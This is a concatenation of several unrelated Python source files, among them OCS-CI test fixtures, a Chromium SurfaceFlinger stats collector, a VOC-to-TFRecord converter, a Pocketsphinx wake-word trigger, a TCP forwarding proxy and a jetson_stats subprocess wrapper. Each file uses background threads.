if status == 'terminated':
break
except TimeoutExpiredError:
log.warning(
"Background test execution still in progress before"
"memory leak thread terminated"
)
if thread:
thread.join()
for worker in helpers.get_worker_nodes():
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
os.remove(f"/tmp/{worker}-top-output.txt")
log.info(f"Memory leak capture has stopped")
request.addfinalizer(finalizer)
temp_file = tempfile.NamedTemporaryFile(
mode='w+', prefix='test_status', delete=False
)
def get_flag_status():
with open(temp_file.name, 'r') as t_file:
return t_file.readline()
def set_flag_status(value):
with open(temp_file.name, 'w') as t_file:
t_file.writelines(value)
set_flag_status('running')
def run_memory_leak_in_bg():
"""
Function to run memory leak capture in a background thread.
Memory leak data is written in the format below:
date time PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
"""
oc = ocp.OCP(
namespace=config.ENV_DATA['cluster_namespace']
)
while get_flag_status() == 'running':
for worker in helpers.get_worker_nodes():
filename = f"/tmp/{worker}-top-output.txt"
top_cmd = f"debug nodes/{worker} -- chroot /host top -n 2 b"
with open("/tmp/file.txt", "w+") as temp:
temp.write(str(oc.exec_oc_cmd(
command=top_cmd, out_yaml_format=False
)))
temp.seek(0)
for line in temp:
if line.__contains__("ceph-osd"):
with open(filename, "a+") as f:
f.write(str(datetime.now()))
f.write(' ')
f.write(line)
log.info(f"Start memory leak data capture in the test background")
thread = threading.Thread(target=run_memory_leak_in_bg)
thread.start()
@pytest.fixture()
def aws_obj():
"""
Initialize AWS instance
Returns:
AWS: An instance of AWS class
"""
aws_obj = aws.AWS()
return aws_obj
@pytest.fixture()
def ec2_instances(request, aws_obj):
"""
Get cluster instances
Returns:
dict: The ID keys and the name values of the instances
"""
# Get all cluster nodes objects
nodes = node.get_node_objs()
# Get the cluster nodes ec2 instances
ec2_instances = aws.get_instances_ids_and_names(nodes)
assert ec2_instances, f"Failed to get ec2 instances for node {[n.name for n in nodes]}"
def finalizer():
"""
Make sure all instances are running
"""
# Getting the instances that are in status 'stopping' (if there are any), to wait for them to
# get to status 'stopped' so it will be possible to start them
stopping_instances = {
key: val for key, val in ec2_instances.items() if (
aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPING
)
}
# Waiting for the instances that are in status 'stopping'
# (if there are any) to reach 'stopped'
if stopping_instances:
for stopping_instance in stopping_instances:
instance = aws_obj.get_ec2_instance(stopping_instance)
instance.wait_until_stopped()
stopped_instances = {
key: val for key, val in ec2_instances.items() if (
aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPED
)
}
# Start the instances
if stopped_instances:
aws_obj.start_ec2_instances(instances=stopped_instances, wait=True)
request.addfinalizer(finalizer)
return ec2_instances
@pytest.fixture()
def nodes():
"""
Return an instance of the relevant platform nodes class
(e.g. AWSNodes, VMWareNodes) to be later used in the test
for nodes related operations, like nodes restart,
detach/attach volume, etc.
"""
factory = platform_nodes.PlatformNodesFactory()
nodes = factory.get_nodes_platform()
return nodes
|
surface_stats_collector.py
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import Queue
import datetime
import logging
import re
import threading
from pylib import android_commands
from pylib.device import device_utils
# Log marker containing SurfaceTexture timestamps.
_SURFACE_TEXTURE_TIMESTAMPS_MESSAGE = 'SurfaceTexture update timestamps'
_SURFACE_TEXTURE_TIMESTAMP_RE = r'\d+'
class SurfaceStatsCollector(object):
"""Collects surface stats for a SurfaceView from the output of SurfaceFlinger.
Args:
device: A DeviceUtils instance.
"""
def __init__(self, device):
# TODO(jbudorick) Remove once telemetry gets switched over.
if isinstance(device, android_commands.AndroidCommands):
device = device_utils.DeviceUtils(device)
self._device = device
self._collector_thread = None
self._surface_before = None
self._get_data_event = None
self._data_queue = None
self._stop_event = None
self._warn_about_empty_data = True
def DisableWarningAboutEmptyData(self):
self._warn_about_empty_data = False
def Start(self):
assert not self._collector_thread
if self._ClearSurfaceFlingerLatencyData():
self._get_data_event = threading.Event()
self._stop_event = threading.Event()
self._data_queue = Queue.Queue()
self._collector_thread = threading.Thread(target=self._CollectorThread)
self._collector_thread.start()
else:
raise Exception('SurfaceFlinger not supported on this device.')
def Stop(self):
assert self._collector_thread
(refresh_period, timestamps) = self._GetDataFromThread()
if self._collector_thread:
self._stop_event.set()
self._collector_thread.join()
self._collector_thread = None
return (refresh_period, timestamps)
def _CollectorThread(self):
last_timestamp = 0
timestamps = []
retries = 0
while not self._stop_event.is_set():
self._get_data_event.wait(1)
try:
refresh_period, new_timestamps = self._GetSurfaceFlingerFrameData()
if refresh_period is None or new_timestamps is None:
retries += 1
if retries < 3:
continue
if last_timestamp:
# Some data has already been collected, but either the app
# was closed or there's no new data. Signal the main thread and
# wait.
self._data_queue.put((None, None))
self._stop_event.wait()
break
raise Exception('Unable to get surface flinger latency data')
timestamps += [timestamp for timestamp in new_timestamps
if timestamp > last_timestamp]
if len(timestamps):
last_timestamp = timestamps[-1]
if self._get_data_event.is_set():
self._get_data_event.clear()
self._data_queue.put((refresh_period, timestamps))
timestamps = []
except Exception as e:
# On any error, before aborting, put the exception into _data_queue to
# prevent the main thread from waiting at _data_queue.get() infinitely.
self._data_queue.put(e)
raise
def _GetDataFromThread(self):
self._get_data_event.set()
ret = self._data_queue.get()
if isinstance(ret, Exception):
raise ret
return ret
def _ClearSurfaceFlingerLatencyData(self):
"""Clears the SurfaceFlinger latency data.
Returns:
True if SurfaceFlinger latency is supported by the device, otherwise
False.
"""
# The command returns nothing if it is supported, otherwise returns many
# lines of result just like 'dumpsys SurfaceFlinger'.
results = self._device.RunShellCommand(
'dumpsys SurfaceFlinger --latency-clear SurfaceView')
return not len(results)
def GetSurfaceFlingerPid(self):
results = self._device.RunShellCommand('ps | grep surfaceflinger')
if not results:
raise Exception('Unable to get surface flinger process id')
pid = results[0].split()[1]
return pid
def _GetSurfaceFlingerFrameData(self):
"""Returns collected SurfaceFlinger frame timing data.
Returns:
A tuple containing:
- The display's nominal refresh period in milliseconds.
- A list of timestamps signifying frame presentation times in
milliseconds.
The return value may be (None, None) if there was no data collected (for
example, if the app was closed before the collector thread has finished).
"""
# adb shell dumpsys SurfaceFlinger --latency <window name>
# prints some information about the last 128 frames displayed in
# that window.
# The data returned looks like this:
# 16954612
# 7657467895508 7657482691352 7657493499756
# 7657484466553 7657499645964 7657511077881
# 7657500793457 7657516600576 7657527404785
# (...)
#
# The first line is the refresh period (here 16.95 ms); it is followed
# by 128 lines with 3 timestamps in nanoseconds each:
# A) when the app started to draw
# B) the vsync immediately preceding SF submitting the frame to the h/w
# C) timestamp immediately after SF submitted that frame to the h/w
#
# The difference between the 1st and 3rd timestamp is the frame-latency.
# An interesting data is when the frame latency crosses a refresh period
# boundary, this can be calculated this way:
#
# ceil((C - A) / refresh-period)
#
# (each time the number above changes, we have a "jank").
# If this happens a lot during an animation, the animation appears
# janky, even if it runs at 60 fps on average.
#
# We use the special "SurfaceView" window name because the statistics for
# the activity's main window are not updated when the main web content is
# composited into a SurfaceView.
results = self._device.RunShellCommand(
'dumpsys SurfaceFlinger --latency SurfaceView')
if not len(results):
return (None, None)
timestamps = []
nanoseconds_per_millisecond = 1e6
refresh_period = long(results[0]) / nanoseconds_per_millisecond
# If a fence associated with a frame is still pending when we query the
# latency data, SurfaceFlinger gives the frame a timestamp of INT64_MAX.
# Since we only care about completed frames, we will ignore any timestamps
# with this value.
pending_fence_timestamp = (1 << 63) - 1
for line in results[1:]:
fields = line.split()
if len(fields) != 3:
continue
timestamp = long(fields[1])
if timestamp == pending_fence_timestamp:
continue
timestamp /= nanoseconds_per_millisecond
timestamps.append(timestamp)
return (refresh_period, timestamps)
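# A minimal sketch (not part of the original collector) of the jank heuristic
# described in _GetSurfaceFlingerFrameData() above: ceil((C - A) / refresh_period)
# is computed per raw dumpsys line (three nanosecond timestamps), and each change
# between consecutive frames counts as one jank. The raw lines are assumed to
# have been captured by the caller; nothing here talks to a device.
import math

def _example_jank_count(refresh_period_ns, raw_latency_lines):
  buckets = []
  for line in raw_latency_lines:
    fields = line.split()
    if len(fields) != 3:
      continue
    draw_start, _, frame_submitted = (int(f) for f in fields)
    buckets.append(
        int(math.ceil((frame_submitted - draw_start) / float(refresh_period_ns))))
  return sum(1 for prev, cur in zip(buckets, buckets[1:]) if cur != prev)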
|
convert_tfrecords.py
|
# Copyright 2018 Changan Wang
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import xml.etree.ElementTree as xml_tree
import numpy as np
import six
import tensorflow as tf
import dataset_common
'''How to organize your dataset folder:
VOCROOT/
|->VOC2007/
| |->Annotations/
| |->ImageSets/
| |->...
|->VOC2012/
| |->Annotations/
| |->ImageSets/
| |->...
|->VOC2007TEST/
| |->Annotations/
| |->...
'''
tf.app.flags.DEFINE_string('dataset_directory', '/media/rs/7A0EE8880EE83EAF/Detections/PASCAL/VOC',
'Root directory of all data')
tf.app.flags.DEFINE_string('train_splits', 'VOC2007, VOC2012',
'Comma-separated list of the training data sub-directory')
tf.app.flags.DEFINE_string('validation_splits', 'VOC2007TEST',
'Comma-separated list of the validation data sub-directory')
tf.app.flags.DEFINE_string('output_directory', '/media/rs/7A0EE8880EE83EAF/Detections/SSD/dataset/tfrecords',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 16,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 16,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
RANDOM_SEED = 180428
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_list_feature(value):
"""Wrapper for inserting a list of bytes features into Example proto.
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
if isinstance(value, six.string_types):
value = six.binary_type(value, encoding='utf-8')
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_name, image_buffer, bboxes, labels, labels_text,
difficult, truncated, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
bboxes: List of bounding boxes for each image
labels: List of labels for bounding box
labels_text: List of labels' name for bounding box
difficult: List of ints indicating the difficulty of that bounding box
truncated: List of ints indicating the truncation of that bounding box
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
ymin = []
xmin = []
ymax = []
xmax = []
for b in bboxes:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([ymin, xmin, ymax, xmax], b)]
# pylint: enable=expression-not-assigned
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/channels': _int64_feature(channels),
'image/shape': _int64_feature([height, width, channels]),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature(labels),
'image/object/bbox/label_text': _bytes_list_feature(labels_text),
'image/object/bbox/difficult': _int64_feature(difficult),
'image/object/bbox/truncated': _int64_feature(truncated),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(image_name.encode('utf8')),
'image/encoded': _bytes_feature(image_buffer)}))
return example
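# A minimal decoding sketch, not used by this converter, showing how the
# Example protos built above could be parsed back with tf.parse_single_example
# (TF 1.x API). Only a subset of the feature keys from _convert_to_example is
# listed here.
def _example_parse_fn(serialized_example):
    keys_to_features = {
        'image/encoded': tf.FixedLenFeature((), tf.string, default_value=''),
        'image/height': tf.FixedLenFeature([1], tf.int64),
        'image/width': tf.FixedLenFeature([1], tf.int64),
        'image/object/bbox/xmin': tf.VarLenFeature(tf.float32),
        'image/object/bbox/ymin': tf.VarLenFeature(tf.float32),
        'image/object/bbox/xmax': tf.VarLenFeature(tf.float32),
        'image/object/bbox/ymax': tf.VarLenFeature(tf.float32),
        'image/object/bbox/label': tf.VarLenFeature(tf.int64),
    }
    return tf.parse_single_example(serialized_example, keys_to_features)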
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _find_image_bounding_boxes(directory, cur_record):
"""Find the bounding boxes for a given image file.
Args:
directory: string; the root path of all data.
cur_record: list of strings; the first is the sub-directory of the record, the second is the image filename.
Returns:
bboxes: List of bounding boxes for each image.
labels: List of labels for bounding box.
labels_text: List of labels' name for bounding box.
difficult: List of ints indicating the difficulty of that bounding box.
truncated: List of ints indicating the truncation of that bounding box.
"""
anna_file = os.path.join(directory, cur_record[0], 'Annotations', cur_record[1].replace('jpg', 'xml'))
tree = xml_tree.parse(anna_file)
root = tree.getroot()
# Image shape.
size = root.find('size')
shape = [int(size.find('height').text),
int(size.find('width').text),
int(size.find('depth').text)]
# Find annotations.
bboxes = []
labels = []
labels_text = []
difficult = []
truncated = []
for obj in root.findall('object'):
label = obj.find('name').text
labels.append(int(dataset_common.VOC_LABELS[label][0]))
labels_text.append(label.encode('ascii'))
isdifficult = obj.find('difficult')
if isdifficult is not None:
difficult.append(int(isdifficult.text))
else:
difficult.append(0)
istruncated = obj.find('truncated')
if istruncated is not None:
truncated.append(int(istruncated.text))
else:
truncated.append(0)
bbox = obj.find('bndbox')
bboxes.append((float(bbox.find('ymin').text) / shape[0],
float(bbox.find('xmin').text) / shape[1],
float(bbox.find('ymax').text) / shape[0],
float(bbox.find('xmax').text) / shape[1]
))
return bboxes, labels, labels_text, difficult, truncated
def _process_image_files_batch(coder, thread_index, ranges, name, directory, all_records, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch index within [0, len(ranges)).
ranges: list of pairs of integers specifying the range of each batch to
analyze in parallel.
name: string, unique identifier specifying the data set
directory: string; the root path of all data
all_records: list of string tuples; the first of each tuple is the sub-directory of the record, the second is the image filename.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
cur_record = all_records[i]
filename = os.path.join(directory, cur_record[0], 'JPEGImages', cur_record[1])
bboxes, labels, labels_text, difficult, truncated = _find_image_bounding_boxes(directory, cur_record)
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, cur_record[1], image_buffer, bboxes, labels, labels_text,
difficult, truncated, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, directory, all_records, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
directory: string; the root path of all data
all_records: list of string tuples; the first of each tuple is the sub-directory of the record, the second is the image filename.
num_shards: integer number of shards for this data set.
"""
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(all_records), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, directory, all_records, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(all_records)))
sys.stdout.flush()
def _process_dataset(name, directory, all_splits, num_shards):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
all_splits: list of strings, sub-path to the data set.
num_shards: integer number of shards for this data set.
"""
all_records = []
for split in all_splits:
jpeg_file_path = os.path.join(directory, split, 'JPEGImages')
images = tf.gfile.ListDirectory(jpeg_file_path)
jpegs = [im_name for im_name in images if im_name.strip()[-3:]=='jpg']
all_records.extend(list(zip([split] * len(jpegs), jpegs)))
shuffled_index = list(range(len(all_records)))
random.seed(RANDOM_SEED)
random.shuffle(shuffled_index)
all_records = [all_records[i] for i in shuffled_index]
_process_image_files(name, directory, all_records, num_shards)
def parse_comma_list(args):
return [s.strip() for s in args.split(',')]
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('val', FLAGS.dataset_directory, parse_comma_list(FLAGS.validation_splits), FLAGS.validation_shards)
_process_dataset('train', FLAGS.dataset_directory, parse_comma_list(FLAGS.train_splits), FLAGS.train_shards)
if __name__ == '__main__':
tf.app.run()
|
pocketsphinxtrigger.py
|
import os
import threading
import logging
import platform
from pocketsphinx import get_model_path
from pocketsphinx.pocketsphinx import Decoder
import alexapi.triggers as triggers
from .basetrigger import BaseTrigger
logger = logging.getLogger(__name__)
class PocketsphinxTrigger(BaseTrigger):
type = triggers.TYPES.VOICE
AUDIO_CHUNK_SIZE = 1024
AUDIO_RATE = 16000
_capture = None
def __init__(self, config, trigger_callback, capture):
super(PocketsphinxTrigger, self).__init__(config, trigger_callback, 'pocketsphinx')
self._capture = capture
self._enabled_lock = threading.Event()
# self._disabled_sync_lock = threading.Event()
self._decoder = None
def setup(self):
# PocketSphinx configuration
ps_config = Decoder.default_config()
# Set recognition model to US
ps_config.set_string('-hmm', os.path.join(get_model_path(), 'en-us'))
ps_config.set_string('-dict', os.path.join(get_model_path(), 'cmudict-en-us.dict'))
# Specify recognition key phrase
ps_config.set_string('-keyphrase', self._tconfig['phrase'])
ps_config.set_float('-kws_threshold', float(self._tconfig['threshold']))
# Hide the VERY verbose logging information when not in debug
if logging.getLogger('alexapi').getEffectiveLevel() != logging.DEBUG:
null_path = '/dev/null'
if platform.system() == 'Windows':
null_path = 'nul'
ps_config.set_string('-logfn', null_path)
# Process audio chunk by chunk. On keyword detected perform action and restart search
self._decoder = Decoder(ps_config)
def run(self):
thread = threading.Thread(target=self.thread, args=())
thread.setDaemon(True)
thread.start()
def thread(self):
while True:
self._enabled_lock.wait()
self._capture.handle_init(self.AUDIO_RATE, self.AUDIO_CHUNK_SIZE)
self._decoder.start_utt()
triggered = False
while not triggered:
if not self._enabled_lock.isSet():
break
# Read from microphone
data = self._capture.handle_read()
# Detect if keyword/trigger word was said
self._decoder.process_raw(data, False, False)
triggered = self._decoder.hyp() is not None
self._capture.handle_release()
self._decoder.end_utt()
if triggered:
self._trigger_callback(self)
def enable(self):
self._enabled_lock.set()
def disable(self):
self._enabled_lock.clear()
|
proxy.py
|
import socket, threading, sys, json
from enum import Enum
import hexdump
from colorama import Fore
import select
from .util import Direction, print_info, get_direction_label
from .proxy_config import load_config, ProxyConfig, ProxyItem
import time
from select import poll
running_proxies = {}
stop_proxies = False
config: ProxyConfig = None
def signal_handler(sig, frame):
global running_proxies
global stop_proxies
if running_proxies:
for proxy in running_proxies.values():
proxy.stop()
running_proxies.clear()
stop_proxies = True
sys.exit(0)
def start_from_config(configFile: str):
global config
config = load_config(configFile)
print("[*] loaded config for {} proxies".format(len(config.proxies)))
for proxy in config.proxies:
thread = threading.Thread(target=start_proxy, args=(proxy,))
thread.start()
def start_single_proxy(
local_port: int,
remote_port: int,
remote_host: str,
local_host: str = None,
verbosity: int = 0,
):
cfg = ProxyItem(
local_host, local_port, remote_host, remote_port, "SingleHost", verbosity
)
start_proxy(cfg)
def start_proxy(proxy_config: ProxyItem):
global running_proxies
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
remote_socket: socket.socket = None
try:
provider_config = config.providers[proxy_config.provider]
provider = provider_config.provider
if provider_config.depends_on and not provider.is_connected:
print(
f"[*] [{proxy_config.name}] checking that dependencies are met before connecting"
)
if not all(
elem in config.providers["initialized"]
for elem in provider_config.depends_on
):
print(
f"[!!] [{proxy_config.name}] not all dependencies are initialized"
)
sys.exit(1)
if not provider.initializing:
provider.connect()
else:
print(
f"[*] [{proxy_config.name}] waiting for provider {provider.name} to finish initializing"
)
while provider.initializing:
time.sleep(1)
server.bind((proxy_config.local_host, proxy_config.local_port))
print(f"[*] Listening on {proxy_config.local_host}:{proxy_config.local_port}")
except Exception as e:
print(
f"[!!] Failed to listen on {proxy_config.local_host}:{proxy_config.local_port}: {str(e)}"
)
print(e)
sys.exit(0)
server.listen()
global stop_proxies
while not stop_proxies:
client_socket, addr = server.accept()
proxy = Proxy(client_socket, proxy_config, remote_socket)
proxy.start()
running_proxies[proxy.name] = proxy
class Proxy:
def __init__(
self,
client_socket: socket.socket,
config: ProxyItem,
remote_host: socket.socket = None,
):
super().__init__()
self.name = "{}->{}:{}".format(
client_socket.getsockname(), config.remote_host, config.remote_port
)
self._local = client_socket
self._config = config
self._stop = False
if remote_host:
self._remote = remote_host
else:
self._remote_connect()
def start(self):
self._thread = threading.Thread(target=self._proxy_loop)
self._thread.start()
def stop(self):
if self._stop:
return
self._stop = True
if self._local:
self._local.close()
self._local = None
if self._remote:
self._remote.close()
self._remote = None
print(Fore.MAGENTA + "Disconnected " + self.name + Fore.RESET)
def _remote_connect(self):
global config
if self._config.provider:
provider_config = config.providers[self._config.provider]
provider = provider_config.provider
if not provider.is_connected:
print("[*] connection was deferred - connecting to provider now...")
provider.connect()
self._remote = provider.client_connect(
self._config.remote_host, self._config.remote_port, self._local
)
else:
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_socket.connect((self._config.remote_host, self._config.remote_port))
self._remote = remote_socket
def _proxy_loop(self):
poller = poll()
poller.register(self._local, select.POLLIN)
poller.register(self._remote, select.POLLIN)
try:
while True:
if self._stop or not self._remote or not self._local:
break
r, w, x = select.select([self._local, self._remote], [], [], 5.0)
# channels = poller.poll(5.0)
if self._local in r:
data = self._local.recv(1024)
if len(data) == 0:
break
print_info(data, Direction.REMOTE, self._config)
self._remote.send(data)
if self._remote in r:
data = self._remote.recv(1024)
if len(data) == 0:
break
print_info(data, Direction.LOCAL, self._config)
self._local.send(data)
except Exception:
import traceback
print(traceback.format_exc())
def _request_handler(self, buffer: str):
# perform any modifications bound for the remote host here
return buffer
def _response_handler(self, buffer: str):
# perform any modifications bound for the local host here
return buffer
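# A hedged sketch (not part of the original module) of a Proxy subclass that
# customizes the handler hooks defined above, hex-dumping traffic via the
# already-imported hexdump package. Note that _proxy_loop currently forwards
# data as-is, so the caller still has to invoke these hooks from there.
class HexDumpProxy(Proxy):
    def _request_handler(self, buffer):
        # dump bytes headed for the remote host
        hexdump.hexdump(buffer)
        return buffer

    def _response_handler(self, buffer):
        # dump bytes headed back to the local client
        hexdump.hexdump(buffer)
        return buffer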
|
command.py
|
# -*- coding: UTF-8 -*-
# This file is part of the jetson_stats package (https://github.com/rbonghi/jetson_stats or http://rnext.it).
# Copyright (c) 2019 Raffaello Bonghi.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import logging
import threading
# Launch command
import subprocess as sp
# Load queue library for python 2 and python 3
try:
import queue
except ImportError:
import Queue as queue
# Create logger
logger = logging.getLogger(__name__)
EXTRA_TIMEOUT = 1.0
# Reference:
# https://eli.thegreenplace.net/2017/interacting-with-a-long-running-child-process-in-python/
# https://stackoverflow.com/questions/37942022/returncode-of-popen-object-is-none-after-the-process-is-terminated/42376107
# https://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python
# https://docs.python.org/3/tutorial/errors.html
# https://stackoverflow.com/questions/10756383/timeout-on-subprocess-readline-in-python
# https://stackoverflow.com/questions/3733270/python-subprocess-timeout
class Command(object):
class CommandException(Exception):
def __init__(self, message, errno):
self.message = message
self.errno = errno
def __str__(self):
return "[errno:{errno}] {message}".format(message=self.message, errno=self.errno)
class TimeoutException(CommandException):
def __init__(self):
super(Command.TimeoutException, self).__init__("Process did not reply in time", -1)
@staticmethod
def run_command(command, repeat=5, timeout=2):
cmd = Command(command)
for idx in range(repeat):
try:
return cmd(timeout=timeout)
except Command.TimeoutException as error:
logger.error("[{idx}] {error}".format(idx=idx, error=error))
raise Command.CommandException("Error to start {command}".format(command=command), -2)
def __init__(self, command):
self.process = None
self.command = command
def __call__(self, timeout=None):
def target(out_queue, err_queue):
# Run process
try:
# https://stackoverflow.com/questions/33277452/prevent-unexpected-stdin-reads-and-lock-in-subprocess
self.process = sp.Popen(self.command, stdout=sp.PIPE, stderr=sp.PIPE, stdin=open(os.devnull), preexec_fn=os.setsid)
# Read lines output
for line in iter(self.process.stdout.readline, b''):
line = line.decode('utf-8')
line = str(line.strip())
out_queue.put(line)
# Close and terminate
self.process.stdout.close()
self.process.wait()
except Exception:
# Store error message
err_queue.put(sys.exc_info())
# Initialize lists
is_timeout = False
out_queue = queue.Queue()
err_queue = queue.Queue()
thread = threading.Thread(target=target, args=(out_queue, err_queue, ))
thread.start()
# Wait timeout process
thread.join(timeout)
if thread.is_alive():
logger.error('Terminating process: {command}'.format(command=self.command))
if self.process is not None:
self.process.terminate()
thread.join(timeout=EXTRA_TIMEOUT)
logger.warning('Process terminated: {command}'.format(command=self.command))
is_timeout = True
# Read the output
# Extract exception and raise
if not err_queue.empty():
ex_type, ex_value, tb_str = err_queue.get()
ex_value.__traceback__ = tb_str
raise ex_value
if is_timeout:
raise Command.TimeoutException()
if self.process.returncode != 0:
raise Command.CommandException('Error process:', self.process.returncode)
return list(out_queue.queue)
def communicate(self, timeout=None):
